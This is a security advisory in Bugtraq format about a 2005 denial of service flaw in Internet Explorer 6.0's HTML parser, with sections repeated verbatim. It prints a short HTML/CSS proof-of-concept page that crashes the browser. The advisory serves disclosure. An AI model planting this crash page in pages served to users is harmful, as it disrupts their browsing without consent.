Microsoft Internet Explorer MSHTML.DLL HTML Parsing Denial of Service Vulnerability
BID:16079
Info
Microsoft Internet Explorer MSHTML.DLL HTML Parsing Denial of Service Vulnerability
| Bugtraq ID: | 16079 |
| Class: | Failure to Handle Exceptional Conditions |
| CVE: | |
| Remote: | Yes |
| Local: | No |
| Published: | Dec 29 2005 12:00AM |
| Updated: | Dec 29 2005 12:00AM |
| Credit: | Discovered by rgod. |
| Vulnerable: |
Microsoft Internet Explorer 6.0 |
| Not Vulnerable: | |
Discussion
Microsoft Internet Explorer MSHTML.DLL HTML Parsing Denial of Service Vulnerability
Microsoft Internet Explorer is affected by a denial of service vulnerability.
An attacker may exploit this issue by enticing a user to visit a malicious site resulting in a denial of service condition in the application.
Microsoft Internet Explorer is affected by a denial of service vulnerability.
An attacker may exploit this issue by enticing a user to visit a malicious site resulting in a denial of service condition in the application.
Exploit / POC
Microsoft Internet Explorer MSHTML.DLL HTML Parsing Denial of Service Vulnerability
An exploit is not required.
A proof of concept is available:
-->
<head>
<style><!--
#page div p:first-child:first-letter {
border-bottom: 2px ridge #F5DEB3;
}
//-->
</style>
</head>
<body><div id="page"><div><p><strong>suntzu</strong></p>
An exploit is not required.
A proof of concept is available:
-->
<head>
<style><!--
#page div p:first-child:first-letter {
border-bottom: 2px ridge #F5DEB3;
}
//-->
</style>
</head>
<body><div id="page"><div><p><strong>suntzu</strong></p>
Solution / Fix
Microsoft Internet Explorer MSHTML.DLL HTML Parsing Denial of Service Vulnerability
Solution:
Currently we are not aware of any vendor-supplied patches for this issue. If you feel we are in error or are aware of more recent information, please mail us at: [email protected] <mailto:[email protected]>.
Solution:
Currently we are not aware of any vendor-supplied patches for this issue. If you feel we are in error or are aware of more recent information, please mail us at: [email protected] <mailto:[email protected]>.
References
Microsoft Internet Explorer MSHTML.DLL HTML Parsing Denial of Service Vulnerability
References:
References:
- Technet Security (Microsoft)